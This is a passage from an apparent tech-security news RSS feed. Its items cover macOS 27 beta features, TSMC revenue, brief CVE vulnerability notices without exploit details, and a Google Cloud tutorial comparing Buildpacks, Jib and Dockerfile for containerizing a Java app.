New Photos editing features: Apple Intelligence adds tools that can clean up unwanted objects, adjust image framing, and extend photos beyond their original borders.



Natural-language Shortcuts: Users can describe an automation in normal language, and the Shortcuts app will create the required actions without needing every step to be added manually.



Improved Mail and Messages search: Search results inside Mail and Messages are more accurate, making it easier to locate older conversations and information.



Safari extension builder: macOS 27 can create basic Safari extensions from natural-language instructions, reducing the amount of manual development required.



Updated iPhone Mirroring: The iPhone Mirroring app supports more flexible screen sizes and aspect ratios, making iPhone apps easier to view on a Mac.



Performance improvements: Apple has made system-level changes to improve responsiveness, display rendering, memory management, and CPU use, including on older supported Macs.




The first macOS 27 Golden Gate public beta gives users an early look at Apple’s upcoming Mac features, though bugs and unfinished tools remain possible throughout the testing period. If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[TSMC Posts 68 Percent June Revenue Jump Driven By Heavy AI Demand]]></title>
<description><![CDATA[TSMC, the biggest contract chipmaker in the world, just shared its June financial numbers, and the results easily beat market expectations. The company reported a massive 68 percent jump in revenue compared to the same month last year, reaching roughly 442 billion New Taiwan dollars.



This rapi...]]></description>
<link>https://tsecurity.de/de/3664835/ios-mac-os/tsmc-posts-68-percent-june-revenue-jump-driven-by-heavy-ai-demand/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664835/ios-mac-os/tsmc-posts-68-percent-june-revenue-jump-driven-by-heavy-ai-demand/</guid>
<pubDate>Mon, 13 Jul 2026 11:55:23 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[TSMC, the biggest contract chipmaker in the world, just shared its June financial numbers, and the results easily beat market expectations. The company reported a massive 68 percent jump in revenue compared to the same month last year, reaching roughly 442 billion New Taiwan dollars.



This rapid growth highlights just how much tech companies need advanced artificial intelligence chips to power their latest software and hardware products. With major clients scaling up their operations, TSMC is seeing record demand for its manufacturing services.



Massive artificial intelligence chip demand fuels new revenue records



TSMC is clearly riding a massive wave of spending on artificial intelligence. The June revenue figure was not just a yearly increase. It also showed a 6 percent rise just from May. Over the first six months of the year, the chipmaker has pulled in about 2.4 trillion New Taiwan dollars, which is a 35 percent bump from the same period last year.



A lot of this money comes from its biggest partners. Tech giants like Nvidia, AMD, and Apple rely on TSMC to build the physical chips they design. Because everybody wants more computing power right now, the company has its hands full trying to make enough chips for all these brands.



To handle all these orders, the chipmaker is putting a lot of money into expanding its operations. It recently received the green light to spend 20 billion dollars on its factories in Arizona. This funding will go toward a new wafer plant and a packing facility in the United States. By growing its physical footprint, it hopes to catch up with the never-ending line of customers waiting for parts.



With the busy holiday season coming up and tech brands preparing to launch new smartphones and computers, the need for these small components will only grow. For now, TSMC is sitting in a very comfortable spot as the main builder of the artificial intelligence boom, turning massive hardware demand into record-breaking financial success.]]></content:encoded>
</item>
<item>
<title><![CDATA[Shipolis is a cozy Anno-inspired city builder with a demo live]]></title>
<description><![CDATA[If you love your more casual exploration and building games, Shipolis seems like a neat one inspired by the Anno series.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3664724/linux-tipps/shipolis-is-a-cozy-anno-inspired-city-builder-with-a-demo-live/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664724/linux-tipps/shipolis-is-a-cozy-anno-inspired-city-builder-with-a-demo-live/</guid>
<pubDate>Mon, 13 Jul 2026 11:09:57 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If you love your more casual exploration and building games, Shipolis seems like a neat one inspired by the Anno series.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/1254195746id29376gol.webp" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/07/shipolis-is-a-cozy-anno-inspired-city-builder-with-a-demo-live/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15521 | makafeli n8n-workflow-builder up to 0.11.0 update_node_from_file build/server.cjs filePath path traversal (Issue 28 / EUVD-2026-43261)]]></title>
<description><![CDATA[A vulnerability has been found in makafeli n8n-workflow-builder up to 0.11.0 and classified as critical. Affected is an unknown function of the file build/server.cjs of the component update_node_from_file. The manipulation of the argument filePath leads to path traversal.

This vulnerability is t...]]></description>
<link>https://tsecurity.de/de/3664160/sicherheitsluecken/cve-2026-15521-makafeli-n8n-workflow-builder-up-to-0110-updatenodefromfile-buildservercjs-filepath-path-traversal-issue-28-euvd-2026-43261/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664160/sicherheitsluecken/cve-2026-15521-makafeli-n8n-workflow-builder-up-to-0110-updatenodefromfile-buildservercjs-filepath-path-traversal-issue-28-euvd-2026-43261/</guid>
<pubDate>Mon, 13 Jul 2026 05:38:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/makafeli:n8n-workflow-builder">makafeli n8n-workflow-builder up to 0.11.0</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is an unknown function of the file <em>build/server.cjs</em> of the component <em>update_node_from_file</em>. The manipulation of the argument <em>filePath</em> leads to path traversal.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-15521">CVE-2026-15521</a>. An attack has to be approached locally. Furthermore, there is an exploit available.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50087 | Aqara IAM SSO Gateway up to 3.1/8.2 gw-builder.aqara.com cross-domain policy]]></title>
<description><![CDATA[A vulnerability was found in Aqara IAM SSO Gateway up to 3.1/8.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the component gw-builder.aqara.com. This manipulation causes permissive cross-domain policy with untrusted domains.

This vulnerability is tr...]]></description>
<link>https://tsecurity.de/de/3664087/sicherheitsluecken/cve-2026-50087-aqara-iam-sso-gateway-up-to-3182-gw-builderaqaracom-cross-domain-policy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664087/sicherheitsluecken/cve-2026-50087-aqara-iam-sso-gateway-up-to-3182-gw-builderaqaracom-cross-domain-policy/</guid>
<pubDate>Mon, 13 Jul 2026 04:24:28 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/aqara:iam_sso_gateway">Aqara IAM SSO Gateway up to 3.1/8.2</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this issue is some unknown functionality of the component <em>gw-builder.aqara.com</em>. This manipulation causes permissive cross-domain policy with untrusted domains.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-50087">CVE-2026-50087</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50083 | Aqara IAM SSO Gateway up to 3.1/9.1 gw-builder.aqara.com hard-coded credentials]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Aqara IAM SSO Gateway up to 3.1/9.1. Affected by this vulnerability is an unknown functionality of the component gw-builder.aqara.com. Performing a manipulation results in hard-coded credentials.

This vulnerability was named CV...]]></description>
<link>https://tsecurity.de/de/3663701/sicherheitsluecken/cve-2026-50083-aqara-iam-sso-gateway-up-to-3191-gw-builderaqaracom-hard-coded-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663701/sicherheitsluecken/cve-2026-50083-aqara-iam-sso-gateway-up-to-3191-gw-builderaqaracom-hard-coded-credentials/</guid>
<pubDate>Sun, 12 Jul 2026 20:08:51 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/aqara:iam_sso_gateway">Aqara IAM SSO Gateway up to 3.1/9.1</a>. Affected by this vulnerability is an unknown functionality of the component <em>gw-builder.aqara.com</em>. Performing a manipulation results in hard-coded credentials.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-50083">CVE-2026-50083</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Buildpacks vs Jib vs Dockerfile: Comparing containerization methods]]></title>
<description><![CDATA[As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of ...]]></description>
<link>https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of the compiled Java classes and would run inside of a "container" running on the JVM. As long as your class files were compatible with the JVM and container, the app would just work.</p><p>That all worked great until people started building non-JVM stuff: Ruby, Python, NodeJS, Go, etc. Now we needed another way to package up apps so they could be run on production systems. To do this we needed some kind of virtualization layer that would allow anything to be run. Heroku was one of the first to tackle this and they used a Linux virtualization system called "lxc" - short for Linux Containers. Running a "container" on lxc was half of the puzzle because still a "container" needed to be created from source code, so Heroku invented what they called "Buildpacks" to create a standard way to convert source into a container.</p><p>A bit later a Heroku competitor named dotCloud was trying to tackle similar problems and went a different route which ultimately led to Docker, a standard way to create and run containers across platforms including Windows, Mac, Linux, Kubernetes, and Google Cloud Run. Ultimately the container specification behind Docker became a standard under the <a href="https://opencontainers.org/" target="_blank">Open Container Initiative (OCI)</a> and the virtualization layer switched from lxc to <a href="https://github.com/opencontainers/runc" target="_blank">runc</a> (also an OCI project).</p><p>The traditional way to build a Docker container is built into the <code>docker</code> tool and uses a sequence of special instructions usually in a file named <code>Dockerfile</code> to compile the source code and assemble the "layers" of a container image.</p><p>Yeah, this is confusing because we have all sorts of different "containers" and ways to run stuff in those containers. And there are also many ways to create the things that run in containers. The bit of history is important because it helps us categorize all of this into three parts:</p><ul><li>Container Builders - Turn source code into a Container Image</li><li>Container Images - Archive files containing a "runnable" application</li><li>Containers - Run Container Images</li></ul><p>With Java EE those three categories map to technologies like:</p><ul><li>Container Builders == Ant or Maven</li><li>Container Images == .jar, .war, or .ear</li><li>Containers == JBoss, WebSphere, WebLogic</li></ul><p>With Docker / OCI those three categories map to technologies like:</p><ul><li>Container Builders == Dockerfile, Buildpacks, or Jib</li><li>Container Images == .tar files usually not dealt with directly but through a "container registry"</li><li>Containers == Docker, Kubernetes, Cloud Run</li></ul><h3>Java Sample Application</h3>Let's explore the Container Builder options further on a little Java server application.  If you want to follow along, clone my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a>:<p><code>git clone https://github.com/jamesward/comparing-docker-methods.git</code><br></p><p><code>cd comparing-docker-methods</code></p><p></p><p>In that project you'll see a basic Java web server in <code>src/main/java/com/google/WebApp.java</code> that just responds with "hello, world" on a GET request to <code>/</code>. Here is the source:<br></p><p></p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'package com.google;\r\n\r\nimport com.sun.net.httpserver.HttpServer;\r\nimport java.io.IOException;\r\nimport java.io.OutputStream;\r\nimport java.net.InetSocketAddress;\r\n\r\npublic class WebApp {\r\n\r\n  public static void main(String[] args) throws IOException {\r\n    int port = Integer.parseInt(System.getenv().getOrDefault("PORT", "8080"));\r\n    HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);\r\n\r\n    server.createContext("/", handler -&gt; {\r\n      byte[] response = "hello, world".getBytes();\r\n      handler.sendResponseHeaders(200, response.length);\r\n      try (OutputStream os = handler.getResponseBody()) {\r\n        os.write(response);\r\n      }\r\n    });\r\n\r\n    System.out.println("Listening at http://localhost:" + port);\r\n\r\n    server.start();\r\n  }\r\n}'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860670&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>This project uses Maven with a minimal <code>pom.xml</code> build config file for compiling and running the Java server:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;?xml version="1.0" encoding="UTF-8"?&gt;\r\n&lt;project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\r\n    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"&gt;\r\n  &lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;\r\n\r\n  &lt;groupId&gt;com.google&lt;/groupId&gt;\r\n  &lt;artifactId&gt;sample-java-mvn&lt;/artifactId&gt;\r\n  &lt;packaging&gt;jar&lt;/packaging&gt;\r\n  &lt;version&gt;0.1.0-SNAPSHOT&lt;/version&gt;\r\n\r\n  &lt;properties&gt;\r\n    &lt;maven.compiler.source&gt;8&lt;/maven.compiler.source&gt;\r\n    &lt;maven.compiler.target&gt;8&lt;/maven.compiler.target&gt;\r\n  &lt;/properties&gt;\r\n\r\n  &lt;build&gt;\r\n    &lt;plugins&gt;\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.codehaus.mojo&lt;/groupId&gt;\r\n        &lt;artifactId&gt;exec-maven-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;1.6.0&lt;/version&gt;\r\n        &lt;executions&gt;\r\n          &lt;execution&gt;\r\n            &lt;goals&gt;\r\n              &lt;goal&gt;java&lt;/goal&gt;\r\n            &lt;/goals&gt;\r\n          &lt;/execution&gt;\r\n        &lt;/executions&gt;\r\n        &lt;configuration&gt;\r\n          &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.apache.maven.plugins&lt;/groupId&gt;\r\n        &lt;artifactId&gt;maven-jar-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;3.2.0&lt;/version&gt;\r\n        &lt;configuration&gt;\r\n          &lt;archive&gt;\r\n            &lt;manifest&gt;\r\n              &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n            &lt;/manifest&gt;\r\n          &lt;/archive&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n    &lt;/plugins&gt;\r\n  &lt;/build&gt;\r\n\r\n&lt;/project&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860c10&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>If you want to run this locally make sure you have Java 8 installed and from the project root directory, run:</p><p><code>./mvnw compile exec:java</code></p><p>You can test the server by visiting: <a href="http://localhost:8080/" target="_blank">http://localhost:8080</a></p><h3>Container Builder: Buildpacks</h3><p>We have an application that we can run locally so let's get back to those Container Builders. Earlier you learned that Heroku invented Buildpacks to create standard, polyglot ways to go from source to a Container Image. When Docker / OCI Containers started gaining popularity Heroku and Pivotal worked together to make their Buildpacks work with Docker / OCI Containers. That work is now a sandbox Cloud Native Computing Foundation project: <a href="https://buildpacks.io/" target="_blank">https://buildpacks.io/</a></p><p>To use Buildpacks you will need to <a href="https://docs.docker.com/get-started/" target="_blank">install Docker</a> and <a href="https://github.com/buildpacks/pack/releases" target="_blank">the pack tool</a>. Now from the command line tell Buildpacks to take your source and turn it into a Container Image:</p><p><code>pack build --builder=gcr.io/buildpacks/builder:v1 comparing-docker-methods:buildpacks</code></p><p>Magic! You didn't have to do anything and the Buildpacks knew how to turn that Java application into a Container Image. It even works on Go, NodeJS, Python, and .Net apps out-of-the-box. So what just happened?  Buildpacks inspect your source and try to identify it as something it knows how to build. In the case of our sample application it noticed the <code>pom.xml</code> file and decided it knows how to build Maven-based applications. The <code>--builder</code> flag told it where to get the Buildpacks from. In this case, <code>gcr.io/buildpacks/builder:v1</code> are the Container Image coordinates to <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks">Google Cloud's Buildpacks</a>. Alternatively you could use the Heroku or Paketo Buildpacks. The parameter <code>comparing-docker-methods:buildpacks</code> is the Container Image coordinates for where to store the output. In this case it stores on the local docker daemon. You can now run that Container Image locally with <code>docker</code>:</p><p><code>docker run -it -ePORT=8080 -p8080:8080 comparing-docker-methods:buildpacks</code></p><p>Of course you can also run that Container Image anywhere that runs Docker / OCI Containers like Kubernetes and Cloud Run.</p><p>Buildpacks are nice because in many cases they just work and you don't have to do anything special to turn your source into something runnable. But the resulting Container Images created from Buildpacks can be a bit bulky. Let's use a tool called <a href="https://github.com/wagoodman/dive" target="_blank"><code>dive</code></a> to examine what is in the created container image:</p><p><code>dive comparing-docker-methods:buildpacks</code></p><p></p><p></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_comparison.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>Here you can see the Container Image has 11 layers and a total image size of 319MB. With <code>dive</code> you can explore each layer and see what was changed. In this Container Image the first 6 layers are the base operating system. Layer 7 is the JVM and layer 8 is our compiled application. Layering enables great caching so if only layer 8 changes, then layers 1 through 7 do not need to be re-downloaded. One downside of Buildpacks is how (at least for now) all of the dependencies and compiled application code are stored in a single layer. It would be better to have separate layers for the dependencies and the compiled application.</p><p>To recap, Buildpacks are the easy option that "just works" right out-of-the-box. But the Container Images are a bit large and not optimally layered.</p><h3>Container Builder: Jib</h3><p>The open source <a href="https://github.com/GoogleContainerTools/jib" target="_blank">Jib project</a> is a Java library for creating Container Images with Maven and Gradle plugins. To use it on a Maven project (like the one we from above), just add a build plugin to the <code>pom.xml</code> file:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;plugin&gt;\r\n    &lt;groupId&gt;com.google.cloud.tools&lt;/groupId&gt;\r\n    &lt;artifactId&gt;jib-maven-plugin&lt;/artifactId&gt;\r\n    &lt;version&gt;2.6.0&lt;/version&gt;\r\n&lt;/plugin&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d30&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>Now a Container Image can be created and stored in the local docker daemon by running:</p><p><code>./mvnw compile jib:dockerBuild -Dimage=comparing-docker-methods:jib</code></p><p>Using <code>dive</code> we will see that the Container Image for this application is now only 127MB thanks to slimmer operating system and JVM layers. Also, on a Spring Boot application we can see how Jib layers the dependencies, resources, and compiled application for better caching:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Spring_Boot_Application.max-1000x1000.png" alt="Spring Boot Application">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>In this example the 18MB layer contains the runtime dependencies and the final layer contains the compiled application. Unlike with Buildpacks the original source code is not included in the Container Image. Jib also has a great feature where you can use it without docker being installed, as long as you store the Container Image on an external Container Registry (like DockerHub or the Google Cloud Container Registry). Jib is a great option with Maven and Gradle builds for Container Images that use the JVM.</p><h3>Container Builder: Dockerfile</h3><p>The traditional way to create Container Images is built into the <code>docker</code> tool and uses a sequence of instructions defined in a file usually named <code>Dockerfile</code>. Here is a <code>Dockerfile</code> you can use with the sample Java application:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM adoptopenjdk/openjdk8 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nFROM adoptopenjdk/openjdk8:jre\r\n\r\nCOPY --from=builder /app/target/*.jar /server.jar\r\n\r\nCMD ["java", "-jar", "/server.jar"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d90&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>In this example, the first four instructions start with the AdoptOpenJDK 8 Container Image and build the source to a Jar file. The final Container Image is created from the AdoptOpenJDK 8 JRE Container Image and includes the created Jar file. You can run <code>docker</code> to create the Container Image using the <code>Dockerfile</code> instructions:</p><p><code>docker build -t comparing-docker-methods:dockerfile </code></p><p>Using <code>dive</code> we can see a pretty slim Container Image at 209MB:<br></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Container_image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>With a <code>Dockerfile</code> we have full control over the layering and base images. For example, we could use the <a href="https://github.com/GoogleContainerTools/distroless/tree/master/java" target="_blank">Distroless Java base image</a> to trim down the Container Image even further. This method of creating Container Images provides a lot of flexibility but we do have to write and maintain the instructions.</p><p>With this flexibility we can do some cool stuff. For example, we can use GraalVM to create a "native image" of our application. This is an ahead-of-time compiled binary which can reduce startup time, reduce memory usage, and alleviate the need for a JVM in the Container Image. And we can go even further and create a statically linked native image which includes everything needed to run so that even an operating system is not needed in the Container Image. Here is the Dockerfile to do that:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM oracle/graalvm-ce:20.2.0-java11 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN gu install native-image\r\n\r\n# BEGIN PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n# SEE: https://github.com/oracle/graal/blob/master/substratevm/StaticImages.md\r\nARG RESULT_LIB="/staticlibs"\r\n\r\nRUN mkdir ${RESULT_LIB} &amp;&amp; \\\r\n    curl -L -o musl.tar.gz https://musl.libc.org/releases/musl-1.2.1.tar.gz &amp;&amp; \\\r\n    mkdir musl &amp;&amp; tar -xvzf musl.tar.gz -C musl --strip-components 1 &amp;&amp; cd musl &amp;&amp; \\\r\n    ./configure --disable-shared --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /muscl &amp;&amp; rm -f /musl.tar.gz &amp;&amp; \\\r\n    cp /usr/lib/gcc/x86_64-redhat-linux/4.8.2/libstdc++.a ${RESULT_LIB}/lib/\r\n\r\nENV PATH="$PATH:${RESULT_LIB}/bin"\r\nENV CC="musl-gcc"\r\n\r\nRUN curl -L -o zlib.tar.gz https://zlib.net/zlib-1.2.11.tar.gz &amp;&amp; \\\r\n   mkdir zlib &amp;&amp; tar -xvzf zlib.tar.gz -C zlib --strip-components 1 &amp;&amp; cd zlib &amp;&amp; \\\r\n   ./configure --static --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /zlib &amp;&amp; rm -f /zlib.tar.gz\r\n#END PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nRUN native-image \\\r\n  --static \\\r\n  --libc=musl \\\r\n  --no-fallback \\\r\n  --no-server \\\r\n  --install-exit-handlers \\\r\n  -H:Name=webapp \\\r\n  -cp /app/target/*.jar \\\r\n  com.google.WebApp\r\n\r\nFROM scratch\r\n\r\nCOPY --from=builder /app/webapp /webapp\r\n\r\nENTRYPOINT ["/webapp"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860df0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>You will see there is a bit of setup needed to support static native images. After that setup the Jar is compiled like before with Maven. Then the <code>native-image</code> tool creates the binary from the Jar. The <code>FROM scratch</code> instruction means the final container image will start with an empty one. The statically linked binary created by <code>native-image</code> is then copied into the empty container.</p><p>Like before you can use <code>docker</code> to build the Container Image:</p><p><code>docker build -t comparing-docker-methods:graalvm .</code></p><p>Using <code>dive</code> we can see the final Container Image is only 11MB!</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_Image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>And it starts up super fast because we don't need the JVM, OS, etc. Of course GraalVM is not always a great option as there are some challenges like dealing with reflection and debugging. You can read more about this in my blog, <a href="https://jamesward.com/2020/05/07/graalvm-native-image-tips-tricks/" target="_blank">GraalVM Native Image Tips &amp; Tricks</a>.</p><p>This example does capture the flexibility of the <code>Dockerfile</code> method and the ability to do anything you need. It is a great escape hatch when you need one.</p><h3>Which Method Should You Choose?</h3><p></p><ul><li>The easiest, polyglot method: Buildpacks</li><li>Great layering for JVM apps: Jib</li><li>The escape hatch for when those methods don't fit: Dockerfile</li></ul><p></p><p>Check out my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a> to explore these methods as well as the mentioned Spring Boot + Jib example.</p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Announcing Google Cloud buildpacks—container images made easy</h4>
            <p class="uni-related-article-tout__body">Google Cloud buildpacks make it much easier and faster to build applications on top of containers.</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10865 | stylemix Cost Calculator Builder Plugin up to 4.0.11 on WordPress Global Settings template body client_secret/secret key missing encryption (EUVD-2026-43152)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in stylemix Cost Calculator Builder Plugin up to 4.0.11 on WordPress. The affected element is an unknown function of the file template body of the component Global Settings. Performing a manipulation of the argument client_secret/secret ...]]></description>
<link>https://tsecurity.de/de/3662618/sicherheitsluecken/cve-2026-10865-stylemix-cost-calculator-builder-plugin-up-to-4011-on-wordpress-global-settings-template-body-clientsecretsecret-key-missing-encryption-euvd-2026-43152/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662618/sicherheitsluecken/cve-2026-10865-stylemix-cost-calculator-builder-plugin-up-to-4011-on-wordpress-global-settings-template-body-clientsecretsecret-key-missing-encryption-euvd-2026-43152/</guid>
<pubDate>Sun, 12 Jul 2026 03:55:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/stylemix:cost_calculator_builder_plugin">stylemix Cost Calculator Builder Plugin up to 4.0.11</a> on WordPress. The affected element is an unknown function of the file <em>template body</em> of the component <em>Global Settings</em>. Performing a manipulation of the argument <em>client_secret/secret key</em> results in missing encryption of sensitive data.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-10865">CVE-2026-10865</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Europe 2025 | Bootstrapping Trust: From Isolated Build Machines to Enclaved CI Pipelines]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 2x - Views:16 This session presents a production-ready approach to securing CI build pipelines against compromised infrastructure by anchoring trust in a physically isolated build machine and leveraging enclave-based builders. The isolated machine compiles and signs...]]></description>
<link>https://tsecurity.de/de/3662082/it-security-video/black-hat-europe-2025-bootstrapping-trust-from-isolated-build-machines-to-enclaved-ci-pipelines/</link>
